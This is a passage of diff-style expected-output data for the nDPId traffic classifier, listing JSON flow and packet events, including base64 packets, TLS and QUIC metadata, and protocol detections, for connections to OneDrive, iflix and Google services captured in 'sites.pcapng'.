{"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495749875,"flow_last_seen":1646495749875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495749875,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1646495749875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495749875,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8bgJAAEAGHN3AqAGAgeJr0q\/WAbvpKcA1AAAAAKAC+vDq5gAAAgQFtAQCCAoyACVaAAAAAAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1646495750196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495750196,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAAC8Gm+eB4mvSwKgBgAG7r9bNFCqu6SnANoASOQgzewAAAgQFoAEBBAIBAwMH"} 
+01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1646495750202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495750202,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItbgRAAEAGGurAqAGAgeJr0q\/WAbvpKcA2zRQqr1AYAfYZ+QAAFgMBAgABAAH8AwMSMXO4WcNq177CYxST5Cayi57AGXeQdEMNPed0f\/vO+CBsnRDIIeROJeOlCByvk7lr9pRUbeR06Cs4dVzQT0oYEAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuaWZsaXguY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOmUL4m7jSQuaHGCv6++\/yOU0VJCaPyexIMcIsguXG5nABcAQQTHBHql0\/iCD7AqH7jE0qyA2MF\/+\/iD9HNmfv2msqiXNFGoZilNx52dlYpSngcjMahYCZatuJxecuXUWxhAYPfzACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1646495785326,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785326,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARxpLAqAGA2DrUjpbyAbsFVWFvygAAAAEIEaJhA\/pmmGIDGZVnAEJ9k4MXlQzkENByBWBPG6JdLnJ97tZTge\/8kX\/RhzOqc4jakqIni2HiqmCs6hTSmZEhkbOUs3lvKsO9F9+XIhOeXqIykOCxzeDPOvDHVnxP2ftNUD1lroHjevW4+JYs\/R0VPIgtCayG\/meCf7Lef9QhWL6YQmXx48ui2W6tYfyIEiaXDMtExoqL+hacVg2HpNlIwJe4PE0\/HEg3ezCS0HD8j4RVM2gk+MitT95qpQmfRz8ntx5WznfpVZvMxU23bid9\/dO3KP4LRTXApe0VNoqcMS8eAgkUyCgd5nSQ87LPgFqnkCEFratISm41sDhhr7ve32C1I\/TlAIhgBRfW87C3WFDVCBagaYOeonExydEo\/D28evz\/tjH6aV7xu0wNblTQywt3lynmNkuwCW7cnmeQuau6oQOA9GiSOfN51L3rFmCObunfGa2ezZE4y2FjFlEEKO\/QIf2CassSbDJm49YK5w7PoSq58kn\/6qIb0Tn5xVj\/LonVQw1HAkNmcP8ql0C7shrF43UdoYXvT\/hOCOA\/VAd6JiIod3M38vXNHkTBOnLJf9TfjJE64UfVXvq5UqVG0r6WldLJGu2xtNgpeDi11dyXdfvaPJX4DN1wutu28hbCiIktfSp6wZpMBmAyygGuO73TqglRovt2xSE4EHwrJMCD4O2TYEurb9uUa0gMyyJFr9\/L+BwLQIYk52z2VLzFmq3EMYlrlu4r\/zm7z83+qa7ryx2Qegl3wdMjyEciWgqgcac28uJhD3lOGWLmvmFxM9fEY1jJKzrVnaWs\/i+ophLeLFpkmeSef74TmyzGpEZIsuPNpoyrlLRH7YPjpxJQS81Wg3bRzpRPypt93N8AAAABCBGiYQP6ZphiAxmVZ0A7KMwiGjnAKddrCOyv2PDiBRWs1qpECiw2xTVInm4f3DIdG9S3r6Co1Q+QqgROt51vL3O9dOvlXAZmpcYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"hangouts.google.com","version":"TLSv1.3","alpn":"h3","ja3":"2a18e6bf307f97c5e27f0ab407dc65db","tls_supported_versions":"TLSv1.3"}} 
02279{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1646495785351,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785351,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMR0xLYOtSOwKgBgAG7lvIFVdbOwgAAAAEDGZVnCBGiYQP6ZphiAEPst9JjIfZ6zFXkACoVjtJE04mEvUBO80J9CXDI1AzGWloBOqzPXI+URdYvHEecgUeYllSRgTGQ\/pdzmzfdkga4V0DlNh9sMthgcZTrWfMiNpOkeHh+8VGEpoSOyr5bTtr6qKEGYg7ZZM+3g8CNri4\/Y4rmU\/u2ucvFt3wUyTEBNlGlntUryhGUoERRNT55NmFJqVuhU\/GueMTfSHsKfOOCMhdksMgHmrVyRumUWVrccMpyqwcE3vpmgCs+uFNthYNXlEj8FMdYAA6FIKpTcrXTgZ3Nm3DRRlDCt76rYa9Ed5zm8JxO+MhvWTGGpqVfgXpQEWyeWMNxG693XFsxTB07PJ3\/YeWP9LrYnM2HgdinrEmJ9dHI16vwi5FQ0cWQJ92cHEvIGKGiq8SA5HEgTnQVmdK2xOmx7dj0KaicL3ol58t8ltkbIXgfkxYhp5yyTHcH3z0UKdCT7GAS6tTRIUS1R7xH75rixlq6B8ZSkGHfajnn6P2ZcdZ\/x0f91Ed0FleO4gdbHHIHetNxBiPPjmSYid1gKObR53SjxAV83g\/W5uVBPG0cabwLojDjBF4yItmMF8ard0uchzKjL7+VPzEBpyA8VAKvlvVbjeonWQ9zdLjCu+3DI5DnZF04lHG772bPMCDbbp1L2TwHKUlogQBjbGpHA7cGqXQ+7rgXzsp8A1LJ4M7UOfhwAhpEZinbjHrtptlKXt3FIxug5QT3rZRFmRCTzNoEN+lueCUbvABz5ahUadsFXVwk+QV6y6OfittlgN9FPzvu2wbXQsdpR7HuGw5be5n5hrjM\/gt9Cn1qYtj8W7tpYyeOF6J2KVyL\/JC\/QJoDFTRmNJOaSu8I9GPipG+PZyHfbkz460Q5SYy9J6Yty8H0OpgvMOxAZyJfdY6HpBJ73a3hMG\/oeLH2XJGbp7tfnJSbIrw7OjnmUjZjC3QFC5ZT\/D9lfLZQtLioZhFU2dvfGzIgp3e6A6JbEE0vFluuvChl2C+0rBUUI4BDQaLDC36yd\/nqeU9YkBNuGMLNwmS1nu9FZU8mcDANqVoY5yVLg2kamNS5X1hNq7e0ZttiC++uqF2vAilhDlKm4Sn9UjPckZuiZBomYpyg0Mx2VTEwtpKds6MA+UAswT6IhWCQVBWewjai+fOWFc9I1PVuJXv6wszew3Hcqcb00f6u5LLpYQLzSeihJuZrVlM1j6lGBHe0EhJ6DL1teURdZuXWHdzyDqDjp983xiqcs411z8ivoxsAQrnJoCWJxd7jZsORlrj+qRu70MzdRwWows6Ir5D2WLnk\/xr5xZXlxc0qq35KzQxuScxBBYPpS5ZzPphWbiD4nd3CHT+adzTjAAAAAQMZlWcIEaJhA\/pmmGJA9VVpI4dKlmrgeF\/YggQi8sjf99E3nv5OtPvRrtZcyuW01yoBM35YdPwOsg50xXr\/BiQRHRmpg5AI\/Gxv40hVq1L2PZoVADVhqqGncF1oScVHTbM9W4m3oXbHay1EHfQ5lAWTWpN49l9Tiv7IrVg
j7Dp+73Bh+\/I4be++4+GN0yWQOqn0T+ijD3iAvjW07u4KFggANU2wFU17wsvlJuMqKoty0iSiIcZD1Fpv8YeBupA3Jd5TcFAQxL\/\/amaXv8CyobSjSega7I6w3iSVpXXusfvcoL9IwMGqCbpjl4yujE+\/2nPBKVvs4iEZolT1zqdJU8Q5tR5vWxmVZ56Vkqmz6hVG35AqABKCyEo\/gk\/PneTs58wsy3Z+6AWG31mbKVGDVWKfuUivH9e1GriPy0Y1T2Vi68\/VxrxY\/w=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495836963,"flow_last_seen":1646495836963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495836963,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1646495836963,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836963,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8O4hAAEAG9ELAqAGAjvq5zsWwAbtVp40sAAAAAKAC+vA0nQAAAgQFtAQCCApsJfcbAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1646495836979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836979,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8r34AAHIGjcyO+rnOwKgBgAG7xbDcn6Z3VaeNLaAS\/\/\/zpwAAAgQFlgQCCApyIEa6bCX3GwEDAwg="} 
-01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1646495836983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495836983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5O4pAAEAG8kPAqAGAjvq5zsWwAbtVp40t3J+meIAYAfYRowAAAQEICmwl9zByIEa6FgMBAgABAAH8AwOIf7nJ5breQpxi5aty74p4A0tH8s+YhJ7uQwoAchgbeyDiYRrjyIJgoj6ghTCikRuTluEoGumBBaOR1N7eUGiD\/gAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5nb29nbGVwbHVzLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBQQOMOQqFJCXmUicpi9d2kYaSiqPqeBjWpdYiUO92OBgAXAEEEwEm0an4CaV7UYrRD1yMS8F4iZzs0QylP5VOKPX+Fji27U1gjEJPJGZS7PVMPfJS0GsqWWRpHV\/lDyKacoCtA0wArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495836963,"flow_last_seen":1646495836963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495836963,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1646495836963,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836963,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8O4hAAEAG9ELAqAGAjvq5zsWwAbtVp40sAAAAAKAC+vA0nQAAAgQFtAQCCApsJfcbAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1646495836979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836979,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8r34AAHIGjcyO+rnOwKgBgAG7xbDcn6Z3VaeNLaAS\/\/\/zpwAAAgQFlgQCCApyIEa6bCX3GwEDAwg="} +01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1646495836983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495836983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5O4pAAEAG8kPAqAGAjvq5zsWwAbtVp40t3J+meIAYAfYRowAAAQEICmwl9zByIEa6FgMBAgABAAH8AwOIf7nJ5breQpxi5aty74p4A0tH8s+YhJ7uQwoAchgbeyDiYRrjyIJgoj6ghTCikRuTluEoGumBBaOR1N7eUGiD\/gAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5nb29nbGVwbHVzLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBQQOMOQqFJCXmUicpi9d2kYaSiqPqeBjWpdYiUO92OBgAXAEEEwEm0an4CaV7UYrRD1yMS8F4iZzs0QylP5VOKPX+Fji27U1gjEJPJGZS7PVMPfJS0GsqWWRpHV\/lDyKacoCtA0wArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 